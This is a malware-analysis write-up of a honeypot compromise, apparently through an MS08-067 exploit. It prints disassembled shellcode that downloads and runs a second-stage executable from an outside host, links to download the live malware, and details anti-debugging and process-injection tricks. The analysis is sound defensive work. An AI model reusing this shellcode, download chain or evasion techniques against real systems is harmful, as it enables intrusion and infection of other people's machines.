![\"bot1\"](\"\/wp-content\/uploads\/2010\/12\/bot11.png\" "\\"bot1\\"")
<\/a>Interested in capturing, documenting and analyzing scans and malicious activity, Corelan Team decided to set up a honeypot and put it online. In the first week of december 2010, Obzy built a machine (default Windows XP SP3 installation, no patches, firewall turned off), named it "EGYPTS-AIRWAYS", set up a honeypot + some other monitoring tools, and connected it to the internet.<\/p>\nAs expected, we quickly started to see all kinds of traffic\u2026 some of them were obvious port scans, others were less obvious recons or attacks. Both exciting and interesting\u2026 We could probably spend some time to document the various types of attacks, maybe build a nice table with figures and produce some kick-ass management graphs and do some trends analysis. It would be a fun exercise\u2026<\/p>\n
\u2026but nothing beats the real deal. <\/p>\n
Nothing beats the thrill of observing an actual exploit being used, a machine getting hacked, rooted \/ infected, (ab)used,\u2026.<\/p>\n
And that's what happened.<\/p>\n
Within the first 2 hours after connecting the box to the internet, something happened\u2026. The machine was not patched, firewall turned off\u2026 so it got pwned. Hard. Our "sitting duck" was shot\u2026 the honeypot project turned into a live malware analysis lab \ud83d\ude42<\/p>\n
<\/p>\n
Scope & Tools<\/h3>\n
What follows below is an analysis of the compromise (initial exploit which staged the infection, and the infection itself). This post is split into several chapters and stages. We wanted to tell a realistic story of the analysis and not so much explain the analysis, pretending we discovered all of the "goodies" during our first run. That would be not realistic and simply not true. We spent a lot of time on this analysis, had to go back to specific functions & redo some of the analysis. <\/p>\n
Note that we did not just run the malware through a behavioural based analysis (sandbox) tool, but we really wanted to know "how" things are done, and not just copy\/paste the report on "what" it does.<\/p>\n
We faced a lot of frustrations\u2026 spent a lot of time on it\u2026 and we had to give up in the end (most likely because we are not really seasoned \/ experienced malware analysts).<\/p>\n
What you're about to read is a chronological write-up of the analysis steps (and not necessarily the chronological infection).<\/p>\n
We will explain how the machine got owned and what happened right after it got owned. We'll try to document the impact to our machine (in terms of infection, behaviour, etc). We have also tried to reveal how the machine is infected permanently (if that is the case), but as you will find out later, this part of the analysis appeared to be more difficult than anticipated, so this post ends with a challenge for you, the reader.<\/p>\n
There are various ways to analyze malware. For the sake of this analysis, we mainly used a quite rudimentary (manual) technique\u2026 we loaded binaries in a debugger and stepped through the individual instructions. Unarguably, this is not only time intensive and rather dangerous, it might also get very complex very fast, and that might make us miss\/ignore things. Of course, we could have used behavioural analysis tools as our main toolset and merely document WHAT the malware does, and then try to find proof for the behaviour\u2026 but that would make us miss certain things as well. <\/p>\n
You will notice however that, at a certain point in the analysis, we actually had to look at the behaviour in order to fill in the gaps between what we could see in the debugger during the initial runs, and what the malware actually does. That allowed us to go back and look at very specific parts of the malware and look for proof for that specific behaviour. <\/p>\n
This explains why we ended up using a couple of simple\/free tools after all, assisting us with revealing some of the missing pieces.<\/p>\n
The combination of both (tools + debugger) should allow us to glue most parts together and demonstrate the various techniques that are used by malware to hide (from debuggers, from AV, from users\u2026 from being detected in general)<\/p>\n
Analyzing malware is fun, can be frustrating, is important (if you care about what happens behind the curtains), and above all\u2026 it's a great learning experience.<\/p>\n
Again, as you will discover, we have not been able to properly document hard proof for all of the malware components. <\/p>\n
Read the post so you can see what we did and did not discover, and then check out the last chapter\u2026 "The Challenge<\/font><\/strong>"<\/p>\n Fasten your seatbelts for an intense ride.<\/p>\n Note : links in this document may point to malicious executables. Pay attention when downloading \/ opening those files !!<\/p>\n<\/blockquote>\n <\/p>\n I'm sure you can imagine the thrill we experienced, and picture the look on our faces when we noticed a messagebox popping on the desktop of the honeypot machine. As we were sorting through events and alerts in the honeypot console, we were already watching the desktop up close. There was absolutely no way we could have missed the crash message stating that the svchost.exe process had crashed unexpectedly. This obviously set off an alarm bell. <\/p>\n The reality is that, by the time we could actually read the text on the popup, the machine already got owned and infected\u2026 <\/p>\n At that time, we decided to keep the machine running for a short while (with our monitoring tools still in place), then isolated it (disconnected it from the net), and started the forensic analysis. <\/p>\n I guess it's unnecessary to state that it would look really bad\u2026 If a service, running with SYSTEM permissions, gets exploited, a lot of nasty things can happen. <\/p>\n Note : all simulations & analysis steps below were executed with administrator permissions, and not as SYSTEM.<\/p>\n<\/blockquote>\n <\/p>\n A wireshark traffic capture of the initial compromise shows this :<\/p>\n This looks like a successful MS08-067 netapi exploit to me (Remember Conficker? You thought netapi exploits were dead & all machines patched & cleaned ?). Anyways, in the TCP session dump, I noticed a bunch of nops followed by what *might* be shellcode :<\/p>\n I converted the 'shellcode' to bytes, converted it into a C array and pasted it into a little c application designed to test shellcode (shellcodetest.c). I compiled the code (with Dev-C++) and loaded the compiled binary in a debugger. <\/p>\n Note : you can download a copy of the c script here : http:\/\/redmine.corelan.be:8800\/attachments\/download\/178\/honeypot_incident_payloadtest.c<\/a> <\/p>\n<\/blockquote>\n As expected, the captured and extracted payload turned out to be shellcode indeed. <\/p>\n The first few bytes after the nops represent a typical GetPC stub (making EBX point at the address of FLDZ), followed by a decoder routine. (XOR [EBX+E],0EE + INC EBX + LOOPD)<\/p>\n After decoding the payload, this is what we get (at [EBX+E]):<\/p>\n This is what the code does :<\/p>\n First, the routine between 0x004020CD and 0x00402111 will get the base address of kernel32 and the function pointer to LoadLibraryA :<\/p>\n After this function ends, we see the function pointer to LoadLibraryA in EAX, and the base address of kernel32.dll in EBP.<\/p>\n In subsequent runs of the same routine (loop), the function pointer to a few other API's is retrieved and stored at an offset of EBP (which is set to the .data section of the binary in our case. Together with the LoadLibraryA pointer, the stack at EBP looks like this :<\/p>\n Next, VirtualAlloc() is called to allocate a memory area of 4096 bytes as RWX. This function returns a pointer to the newly allocated block of memory and stores that pointer in EAX.<\/p>\n Next, the REP MOVS instruction is used to copy payload from [ESI] to [EDI] (which points to 0x00480000 in the test app). After the copy completes, we can find a copy of the payload at 0x00480000 :<\/p>\n Next, a call to CreateThread is executed, pointing the ThreadFunction parameter to the newly allocated memory \/ copied shellcode at 00480000. In essence, this function call will create a new thread, which will execute within the virtual address space of the calling process.<\/p>\n After this call, we see a call to ExitThread() (EBP+10)\u2026<\/p>\n Finally, this first stage will exit\u2026 Nothing special happened so far, right ? Well, that's obviously not true. Let's take it one step back\u2026 The child thread actually did something interesting, but it happened a bit outside of the current debugger view. In fact, the code that was copied to 0x00480000 was executed in a new thread:<\/p>\n Or, in the debugger :<\/p>\n Let's take a closer look at CreateThread<\/a> :<\/p>\n In the CreateThread call, we see 2 parameters : <\/p>\n lpStartAddress (0x00480000, pointing at the beginning of the copied payload) and lpParameter (0x00480095, pointing to a location inside the copied payload). When the CreateThread() function is called (and succeeds), a handle to the new thread is returned. Since lpThreadAttributes is set to zero, this handle cannot be inherited by child processes (which is not an issue here).<\/p>\n So, a new thread will be created, using the data at 0x00480095 as parameter :<\/p>\n The first 6 dwords are in fact API pointers (the ones that were originally stored at EBP+offset earlier on) :<\/p>\n The next dwords represent this :<\/p>\n (unclear at this point what this means or what it's used for, but that doesn't really matter). <\/p>\n Next, we see this :<\/p>\n Without analysing the code, we would suspect that it will use an API in urlmon.dll to download http:\/\/log.y5u.info:443\/img.jpg, rename it to l.exe, and execute it. This would be a typical staged attack deployed by a lot of malware. So let's find out if this is the case. <\/p>\n When we reported the exe to Virustotal, only 12 engines discovered that something is "wrong" with the binary. We reported the file again a week later, and 29 out of the 43 engines detected it as malicious. The most commonly used keyword we saw in the virustotal report was "Vilsel". On public forums and websites, this is classified as a low to medium risk trojan. So it looks like the techniques and level of complexity used in this piece of malware, is just "standard behaviour" nowadays. Kinda scary if you think about it.<\/p>\n<\/blockquote>\n <\/p>\n I enabled 'break on new thread' in the debugger and set a breakpoint at 0x00480000, and eventually I could see the code getting called :<\/p>\n First, a kernel32.GetVersionA() call is performed (at 0x00480012). Then a pointer to "urlmon" is put in EAX and also stored on the stack. As expected, a call to kernel32.LoadLibraryA is performed :<\/p>\n As expected, after the urlmon module is loaded, the function pointer to urlmon.URLDownloadToFileA is retrieved (by the routine that starts at 0048004B)<\/p>\n Then, the stack and registers are set up to perform the URLDownloadToFileA() call : <\/p>\n Stack :<\/p>\n The API call creates a new thread, where the file is downloaded and saved as l.exe, in the current working folder.<\/p>\n Then, the new executable gets executed using WinExec() :<\/p>\n and finally the current thread is terminated using ExitThread()<\/p>\n We'll call the execution of l.exe "stage 2" from this point forward.<\/p>\n So far so good, nothing special at this point. Time elapsed so far : a few seconds.<\/p>\n Note : you can get a copy of l.exe here : http:\/\/redmine.corelan.be:8800\/attachments\/download\/177\/l.exe. This is the only file you need to reproduce the analysis below.<\/p>\n A few seconds ago, our honeypot box was compromised, a new executable was downloaded and executed. What follows is the analysis of stage 2 of the compromise.<\/p>\n The executable uses the following API imports :<\/p>\n So, unless it uses internal code to locate\/execute other API's, it doesn't seem to be doing a lot of harm by itself. On the other hand, it would raise a lot of suspicion if l.exe contained references to more dangerous functions right away. Let's see.<\/p>\n Sys Analyzer reports this :<\/p>\n Anti-Vmware2\u2026 interesting. Well, I'm not using vmware, so I should be good to go, right ? \ud83d\ude42 It might be false positive too. Anyways, since the malware appeared to be running fine on my virtual machine, I don't expect to see any vm detection routines that would prevent the malware from running. After all, this is 2011. We all are running production desktops and\/or servers on VM platforms\u2026 It would be silly to prevent malware from running on VM<\/p>\n<\/blockquote>\n Beenu Arora's Malware Analyzer<\/a> tool reports this : (static analysis)<\/p>\n The take-away from the reports are<\/p>\n So let's just load it in a debugger & see what we can find.<\/p>\n When the executable launches, it does what we could expect from a typically normal C(++) console application : the default SEH handler is put in place, and application arguments (if any) are read from command line. Next, at 0x0040234B, it jumps to main()<\/p>\n In the main() function some memory gets allocated using a malloc(0x1000) call, and then a function is called which performs GetModuleHandleA() (basically retrieving its own baseaddress and storing the pointer in EAX). Next, more memory is allocated (malloc(0x6414)). Then, memory at [EDI] is filled with "0x20 0x20 0x20 0x20" (3F1 dwords) . <\/p>\n It then uses an iteration to overwrite these "space" bytes with new bytes\u2026 new payload? Or just an unpack routine ? Let's see\u2026<\/p>\n Awwww - no payload, but not "harmless" either\u2026 Those look like strings, filenames, function names, reg keys, paths, etc to me\u2026<\/p>\n At this point, the l.exe does not seem to be packed or anything (which probably would flag detection tools right away)<\/p>\n Next, pointers to the following functions are retrieved and pointers are stored at 00404024 + offset: <\/p>\n (and so on, basically getting pointers for all of the functions that were put in memory earlier, and storing the function pointers somewhere in memory :<\/p>\n Next, the binary loads advapi32.dll and rpcrt4.dll, and uses GetProcAddress to get the pointer to RegCreateKeyExA(), RegCloseKey(), RegOpenKeyA(), RegSetValueExA(), <\/p>\n Then, memset() is called (9x9BB bytes), effectively clearing part of the memory location that was used to hold all function names, regkeys, paths, etc.<\/p>\n After memset is executed, we see that part of the memory block was cleared :<\/p>\n Then, kernel32.GetTempPathA() is executed, followed by kernel32.GetTempFileNameA()<\/p>\n After GetTempPathA, the location of the temp folder under C:\\Documents and Settings\\<user>\\Local Settings is retrieved and a pointer to the string is stored in EAX, and used to set up the parameters for GetTempFileNameA()<\/p>\n Next, the following routine is called :<\/p>\n This routine will verify that the process has read access to the specified memory range (the memory block used to hold function names, etc), and then retrieves a pointer to one of the strings from that array into EAX. (FindWindowA), and puts it onto the stack. It then runs the same routine again, retrieves a pointer to string "user32". Basically, this routine will retrieve pointers to strings in the array that was built earlier. This routine will be used many times in the binary.<\/p>\n Next, LoadLibrary() is used to load user32.dll <\/p>\n Then the function pointer of user32.FindWindowsA is retrieved<\/p>\n Next, a pointer to the temporary filename that was retrieved earlier is placed on the stack,<\/p>\n and the routine at 0x00401438 is called. In that routine, we see the following actions :<\/p>\n The code calls the following functions :<\/p>\n After the memcpy, the memory area looks like this :<\/p>\n To cut a long story short, the application decodes\/writes some "stuff" in memory and then creates a tmp file under C:\\Documents and Settings\\<user>\\Local Settings\\Temp :<\/p>\n (Don't pay attention to the filename itself, the filename might be different if you are doing this on your own system. We'll just refer to this file as the .tmp file).<\/p>\n Quick analysis of the tmp file header shows this :<\/p>\n File Type : DLL \u2026 Interesting !<\/p>\n CompanyName : RealNetworks, Inc\u2026. Yeah right.<\/p>\n At 0x00401FB4, a LoadLibrary call is executed, taking the full path to the newly created tmp file as argument\u2026 This reinforces that the .tmp file is really a binary (a dll) :<\/p>\n The LoadLibraryA call loads the dll at baseaddress 0x10000000 :<\/p>\n When the .tmp file was loaded, imm32.dll gets loaded as well (other dll's such as secur32.dll, gdi32.dll, were already loaded earlier), so this is yet another indication that the .tmp file is a binary\/dll and contains some imports from OS dll's.<\/p>\n LoadLibrary has the ability to load both dll's and exe files (which have the same PE structure btw).<\/p>\n<\/blockquote>\n Interestingly, the tmp\/dll file gets loaded without Immunity Debugger reporting that it got loaded. No trace of it in "Executable Modules" and no trace of it in the "log" window either :<\/p>\n The memory map, on the other hand, does indicate that something was loaded at 0x10000000 :<\/p>\n Next, a pointer to the string "rmoc3260.tlb" is put in eax. Next, a pointer to the string "atrc32.dll" is retrieved from the string array and put in eax.<\/p>\n Then, ProcAddress of ProcNameOrdinal nr5 is retrieved :<\/p>\n A pointer to "%ProgramFiles%\\Real\\" is put in eax, then moved to edi. Then, a pointer to "%Systemroot%\\system32\\" is retrieved and moved into ebx. A pointer to "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad" is put in eax.<\/p>\n Then, a memcpy from 00401000 to 0012E884 occurs (0x400 bytes) and a pointer to the string "calc" is retrieved.<\/p>\n The l.exe binary creates a new process : <\/p>\n and it says it's calc.exe \ud83d\ude42<\/p>\n Wow - where did that come from ? We'll look at it in a bit.<\/p>\n Then, VirtualAlloc() is executed, memory is reset (REP STOS), and a call to WriteProcessMemory() is executed, writing 0x1000 bytes to hProcess 0x48 (window), to address 0xA0000, from 0012E884.<\/p>\n Next, the code performs GetThreadContext on thread 4C (window), with pContext pointer set to 0012F884. Finally, ResumeThread() is sent to thread 4C, and the l.exe process is terminated.<\/p>\n Terminated? That was fast. Maybe a little too fast.<\/p>\n Okay, before looking any further, we'll have to analyse the .tmp file (which really is an executable binary\/dll). We already suspect that the file, which is generated at runtime, will be the one responsible for further infection \/ other activity. We also need to look at the calc process, but maybe the tmp file and the calc process are connected\/related to each other. And there's also the WPM call, which writes data to 0xA000\u2026 Maybe that's an injection into the calc process\u2026. We'll see.<\/p>\n All of the above happened in no more than a few seconds.<\/p>\n <\/p>\n In order to analyze what exactly happens when l.exe runs, produces a tmp file and executes code in the "tmp" file, we'll also use a couple of other tools (other than a debugger) to document what happens.<\/p>\n First of all, let's dump the imports used by the dll :<\/p>\n Wow - impressive list \u2026 and the imported function names indicate a couple of things :<\/p>\n The list with exported functions is a lot smaller :<\/p>\n So we can expect to see a limited number of functions in the dll, implementing the required logic to do more harm (maybe it will permanently infect the machine, propagate, etc etc). All we know so far is that the dll gets loaded by l.exe, but it has been unclear what exactly it does or has done so far. <\/p>\n Maybe the combination of l.exe and the tmp file will produce new functions. Reproducing new code at runtime is not that uncommon in malware. In fact, this is a frequently used technique in malicious code when trying to hide routines from getting detected by AV. <\/p>\n What is really strange is that the debugger didn't report that the tmp file got loaded as a library. (At least, not at first sight). <\/p>\n Procmon reports a lot of activity generated by l.exe, so it looks like something was injected and executed, trying to hide from debuggers and\/or procmon. <\/p>\n There must be something else going on\u2026<\/p>\n Running l.exe outside the debugger shows a lot of interaction :<\/p>\n \u2026 that's a lot more than what we saw in the debugger analysis of l.exe.<\/p>\n (You can get a copy of the procmon output here : http:\/\/redmine.corelan.be:8800\/attachments\/download\/179\/l.exe.Logfile.PML<\/a>)<\/p>\n To be sure, we also tried to use Windows System State Analyzer<\/a> to document changes to the OS. I created a snapshot before and after the infection occurred, but the utility died when trying to compare the results. Fail.<\/p>\n We can expect\/assume that l.exe is calling code in the tmp\/dll file or using bytes (as data) to recreate new code. If it reproduces new code and injects it into another process, it would explain why procmon reports a lot more activity than what we documented by looking at l.exe itself. But we should be able to at least retrieve "something" about it in the debugger. At this point, all we saw is that the tmp file was loaded, and shortly after, the process died.<\/p>\n Let's try to reveal how the code in the dll (tmp) gets called & what it does, and why the behavior of l.exe is different when ran inside a debugger vs outside a debugger. It certainly smells like one or more anti-debugging tricks were used.<\/p>\n Let's take a few steps back & look at the LoadLibrary call again (which loads the tmp file). This call is located at 0x00401FB4. We'll walk through the instructions again, this time paying close attention to anti-debugger routines as well.<\/p>\n A few instructions below the loadlibrary call, we see a call to DWORD [EBP-14] and a call to [DWORD EBP-44]<\/p>\n At [EBP-14], we see this :<\/p>\n Ah - that's code inside the dll.. IDA recognizes this as function RMOC3260_5<\/p>\n This function writes pointers inside the loaded module onto the stack (pointed to by EAX+ offset) :<\/p>\n or - as seen on the stack :<\/p>\n Next, when the routine has returned, a call to [EBP-44] is made. EBP-44 points to 10003CB1, and that is yet another function in the dll :<\/p>\n First, ecx and eax are pushed onto the stack. Then, the linear adress of the PEB (fs:30h<\/a>) is put into eax (7FFDC000 in our case), and then written to ESP+4. Then the top value is popped from the stack again, into eax (basically restoring what was in eax before the PEB pointer was retrieved). Next, the linear address of the PEB is put in EAX. EAX is then set to 1, and the linear address of PEB (which still sits at the top of the stack at this point), is popped into ECX.<\/p>\n When that function returns, we see<\/p>\n EAX is set to 1, so the jump will be made (to 00402188) :<\/p>\n Hmmm - it looks like it frees the library and deletes the tmp file. <\/p>\n The PUSH DWORD [EBP-4] puts a pointer to the startaddress of the loaded dll on the stack (0x10000000). FreeLibrary() takes this as argument.<\/p>\n This effectively unloads the dll from memory (so 0x10000000 points to nowhere after the call is made).<\/p>\n The call to kernel32.DeleteFileA removes the tmp file (PUSH EAX pushes a pointer to the full filename\/path of the tmp to the stack and DeleteFileA takes that as argument)<\/p>\n The code continues, and calls function 0x00401D76. In that function, we first see a call to 004021E0, then does a memset and memcpy, and ends up calling CreateProcessA (0x00401E05), taking 0012FB50 as pStartupInfo and 0x0012FB98 as pProcessInfo :<\/p>\n We have seen this (calc) before in the analysis of stage 2, but it has become clear that we missed a piece. Loading a dll, calling a simple function, and removing it again \u2026 Something doesn't seem right\u2026<\/p>\n Let's go back to the function at 10003CB1. Based on the outcome (EAX being 0 or 1), the code decides to unload the dll \/ clear memory or not. The outcome of the routine is different depending on whether there is a debugger attached or not\u2026 <\/p>\n Think about it. Look back at the routine. At a certain point, it reads a value from [EAX+2]. At that point, EAX points to the PEB<\/a>. So this code reads the "BeingDebugged" flag from the PEB and stores the result in EAX. <\/p>\n Basic schoolbook anti-debugging trick. <\/p>\n So let's step back & change the logic. Let's run the code again (breakpoint set at 0x00402014 - where the call to EBP-44 is made). Just before the function returns, change EAX to 0 : <\/p>\n Because of the change, the jump to unload the dll & clean up memory is not taken, and the malware continues to execute a different set of code :<\/p>\n Of course, I can also use a PyCommand for Immunity Debugger : !hidedebug All_Debug, which will patch a couple of known techniques to detect if a debugger is present or not:<\/p>\n After patching PEB, the code continues and a function at 0x00401D4B is called (at 0x0040202A).<\/p>\n In that function, we see this :<\/p>\n We end up calling 0x00401D13 and 00401CA3. Inside the function at 0x00401CA3, a call is made to 004023A8, where a SEH record is created and some pointers to strings and an API is put onto the stack :<\/p>\n Then, after this function returns, we see this :<\/p>\n The I\/O command at 00401CCB generates an exception, and the SEH record which was created a few instructions above gets called<\/p>\n I set a breakpoint at 0x00402210 and passed the exception to the application. As expected, the handler gets called :<\/p>\n A jmp to msvcrt._except_handler is performed. In that routine, 77C3930C is called. In that function, we observe<\/p>\n When the function returns, another exception is triggered :<\/p>\n At that time, the SEH chain still points to 0x00402210<\/p>\n Pass the exception to the application (Shift+F9). This generates a debugger message that says "Illegal instruction - use Shift+F7\/F8\/F9 to pass exception to program". Pass the exception again (Shift+F9).<\/p>\n This brings us back at 0x00402210 (same location as a few moments ago).<\/p>\n The fact that the binary uses a custom SEH record *might* be an indication that it's trying to fool automated tools by making it think that it's corrupted or broken, while it still effectively can redirect flow. You can find some more info about this concept here.<\/p>\n<\/blockquote>\n Again, msvcrt.77C3930C gets called, but this time no VirtualQuery occurs. This time, the code ends up calling ntdll.ZwContinue. Parameters to the call are Arg1 : 0012F8A8 and Arg2 : 00000000 <\/p>\n In that function, we get redirected to 00401C57 and in that function, 004023E3 is called (which, as expected, removes one entry from the SEH chain)<\/p>\n The code continues at 0040202F. This calls 004014D1 (which is the function that will get a pointer to a string in the string table that was mentioned earlier). The string that is retrieved, is "_!RKU#PNP#090921!_".<\/p>\n Then, a call is made to kernel32.OpenMutexA, using the following parameters :<\/p>\n OpenMutexA will open an existing named mutex object (referenced by MutexName). This could be a technique, used by the binary, to find out if the malware is already running. In the kernel32.OpenMutexA function, the string is converted to Unicode, and then ntdll.ZwOpenMutant is called (Arg1 : 0012FB78, Arg2 : 00000001, Arg3 : 0012FB58) <\/p>\n The call to OpenMutexA returns 0 (eax), so no jump is made to 00402162 :<\/p>\n Anyways, the OpenMutexA call returned 0, so the code continues with a call to 100058FC.<\/p>\n In that function, it first pushes 2 dwords to the stack and then calls routine at 0x10005F00. In that routine, some pointers are pushed onto the stack, and a new exception handler record (pointing at 0x10005F54) is created.<\/p>\n Then function 10005908 is called. It generates the string "TYPELIB" on the stack, fetches a pointer to the string, and sets up the arguments for a FindResourceA() API call :<\/p>\n "TYPELIB" - interesting \ud83d\ude42<\/p>\n Next, SizeofResource is called (with hModule set to 0x10000000 and hResource set to 1000C080 (eax)). The call returns 0x4289 (stored in eax). Then, LoadResource is performed :<\/p>\n This returns a pointer to the resource : 0x1000C0B0 :<\/p>\n This pointer is then written onto the stack (at EBP-1C).<\/p>\n Next, a VirtualAlloc() is executed, (0x10000 bytes, ReadWrite), which returns pointer 0x00380000 (stored in eax). This pointer is also written to the stack (right above the pointer to the resource).<\/p>\n Next, kernel32.SetHandleCount(0x1000C0B0) is executed.<\/p>\n At 1000599C, another function is called : 10002E38. This is (coincidence or not) the first pointer that was stored in the function pointer array on the stack (pointers to functions inside the dll). Inside function 10002E38, another function gets called (0x10002DCF). <\/p>\n A stack setup is prepared\u2026<\/p>\n \u2026 followed by a loop that starts writing bytes to the newly allocated memory region (0x00380000) :<\/p>\n The function ends and returns to 0x100059A1. Then a couple of functions are called and eventually something that looks like an executable is written to 00390000 \u2026<\/p>\n \u2026 and a little later, another set of bytes is written (to 00391xxx)<\/p>\n A third set of bytes (0x896) is written to 00394000 :<\/p>\n and that starts to look like some of the entries we saw in the procmon report.<\/p>\n Full dump :<\/p>\n Look at the strings in the list - some of them are really interesting<\/p>\n (Let's see if we notice one or more of those strings further down along the road)<\/p>\n The production of binary data\/bytes continues : 0x2048 bytes are written to 00395000<\/p>\n 0x256 bytes are written to 00397000 :<\/p>\n Then the code continues with a call to GetModuleHandleA("advapi32.dll"). <\/p>\n This function returns the base pointer to advapi32.dll and puts it in eax. <\/p>\n Next, a loop of GetProcAddress() calls are executed, looking for the function pointers (pointer to the function name string is put ECX) to the functions in advapi32.dll, kernel32.dll and msvcrt.dll below. (Function pointers are stored at 00394000 + offset)<\/p>\n\n
svchost.exe<\/h3>\n
\n
December 2nd, 2010 21:43:52 GMT+1 - the initial compromise<\/h3>\n
<\/a><\/p>\n<\/a><\/p>\n\n
<\/a><\/p>\n00402026 E9 E7000000 JMP TestPayl.00402112\n0040202B 6A 30 PUSH 30\n0040202D 59 POP ECX\n0040202E 64:8B01 MOV EAX,DWORD PTR FS:[ECX]\n00402031 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]\n00402034 8B70 1C MOV ESI,DWORD PTR DS:[EAX+1C]\n00402037 AD LODS DWORD PTR DS:[ESI]\n00402038 5F POP EDI\n00402039 8BF7 MOV ESI,EDI\n0040203B 8B68 08 MOV EBP,DWORD PTR DS:[EAX+8]\n0040203E 6A 06 PUSH 6\n00402040 59 POP ECX\n00402041 E8 87000000 CALL TestPayl.004020CD\n00402046 ^E2 F9 LOOPD SHORT TestPayl.00402041\n00402048 87F5 XCHG EBP,ESI\n0040204A 33C0 XOR EAX,EAX\n0040204C B0 40 MOV AL,40\n0040204E 50 PUSH EAX\n0040204F 66:B8 0010 MOV AX,1000\n00402053 50 PUSH EAX\n00402054 50 PUSH EAX\n00402055 51 PUSH ECX\n00402056 FF55 08 CALL DWORD PTR SS:[EBP+8]\n00402059 97 XCHG EAX,EDI\n0040205A EB 21 JMP SHORT TestPayl.0040207D\n0040205C 5E POP ESI\n0040205D 68 E8000000 PUSH 0E8\n00402062 59 POP ECX\n00402063 68 95000000 PUSH 95\n00402068 5A POP EDX\n00402069 8BDF MOV EBX,EDI\n0040206B F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>\n0040206D 33C0 XOR EAX,EAX\n0040206F 50 PUSH EAX\n00402070 50 PUSH EAX\n00402071 03D3 ADD EDX,EBX\n00402073 52 PUSH EDX\n00402074 53 PUSH EBX\n00402075 50 PUSH EAX\n00402076 50 PUSH EAX\n00402077 FF55 04 CALL DWORD PTR SS:[EBP+4]\n0040207A FF55 10 CALL DWORD PTR SS:[EBP+10]\n0040207D E8 DAFFFFFF CALL TestPayl.0040205C\n00402082 8B6C24 04 MOV EBP,DWORD PTR SS:[ESP+4]\n00402086 8DB5 00040000 LEA ESI,DWORD PTR SS:[EBP+400]\n0040208C 68 94000000 PUSH 94\n00402091 8F06 POP DWORD PTR DS:[ESI]\n00402093 56 PUSH ESI\n00402094 FF55 14 CALL DWORD PTR SS:[EBP+14]\n00402097 837E 08 01 CMP DWORD PTR DS:[ESI+8],1\n0040209B 75 2D JNZ SHORT TestPayl.004020CA\n0040209D 8D45 22 LEA EAX,DWORD PTR SS:[EBP+22]\n004020A0 50 PUSH EAX\n004020A1 FF55 00 CALL DWORD PTR SS:[EBP]\n004020A4 55 PUSH EBP\n004020A5 5E POP ESI\n004020A6 87EF XCHG EDI,EBP\n004020A8 83C7 18 ADD EDI,18\n004020AB 8BE8 MOV EBP,EAX\n004020AD E8 1B000000 CALL TestPayl.004020CD\n004020B2 33C9 XOR ECX,ECX\n004020B4 51 PUSH ECX\n004020B5 51 PUSH ECX\n004020B6 8D46 1C LEA EAX,DWORD PTR DS:[ESI+1C]\n004020B9 50 PUSH EAX\n004020BA 8D46 29 LEA EAX,DWORD PTR DS:[ESI+29]\n004020BD 50 PUSH EAX\n004020BE 51 PUSH ECX\n004020BF FF56 18 CALL DWORD PTR DS:[ESI+18]\n004020C2 8D46 1C LEA EAX,DWORD PTR DS:[ESI+1C]\n004020C5 50 PUSH EAX\n004020C6 50 PUSH EAX\n004020C7 FF56 0C CALL DWORD PTR DS:[ESI+C]\n004020CA FF56 10 CALL DWORD PTR DS:[ESI+10]\n004020CD 51 PUSH ECX\n004020CE 56 PUSH ESI\n004020CF 8B75 3C MOV ESI,DWORD PTR SS:[EBP+3C]\n004020D2 8B7435 78 MOV ESI,DWORD PTR SS:[EBP+ESI+78]\n004020D6 03F5 ADD ESI,EBP\n004020D8 56 PUSH ESI\n004020D9 8B76 20 MOV ESI,DWORD PTR DS:[ESI+20]\n004020DC 03F5 ADD ESI,EBP\n004020DE 33C9 XOR ECX,ECX\n004020E0 49 DEC ECX\n004020E1 41 INC ECX\n004020E2 AD LODS DWORD PTR DS:[ESI]\n004020E3 03C5 ADD EAX,EBP\n004020E5 33DB XOR EBX,EBX\n004020E7 0FBE10 MOVSX EDX,BYTE PTR DS:[EAX]\n004020EA 38F2 CMP DL,DH\n004020EC 74 08 JE SHORT TestPayl.004020F6\n004020EE C1CB 0D ROR EBX,0D\n004020F1 03DA ADD EBX,EDX\n004020F3 40 INC EAX\n004020F4 ^EB F1 JMP SHORT TestPayl.004020E7\n004020F6 3B1F CMP EBX,DWORD PTR DS:[EDI]\n004020F8 ^75 E7 JNZ SHORT TestPayl.004020E1\n004020FA 5E POP ESI\n004020FB 8B5E 24 MOV EBX,DWORD PTR DS:[ESI+24]\n004020FE 03DD ADD EBX,EBP\n00402100 66:8B0C4B MOV CX,WORD PTR DS:[EBX+ECX*2]\n00402104 8B5E 1C MOV EBX,DWORD PTR DS:[ESI+1C]\n00402107 03DD ADD EBX,EBP\n00402109 8B048B MOV EAX,DWORD PTR DS:[EBX+ECX*4]\n0040210C 03C5 ADD EAX,EBP\n0040210E AB STOS DWORD PTR ES:[EDI]\n0040210F 5E POP ESI\n00402110 59 POP ECX\n00402111 C3 RETN\n00402112 E8 14FFFFFF CALL TestPayl.0040202B<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n\n
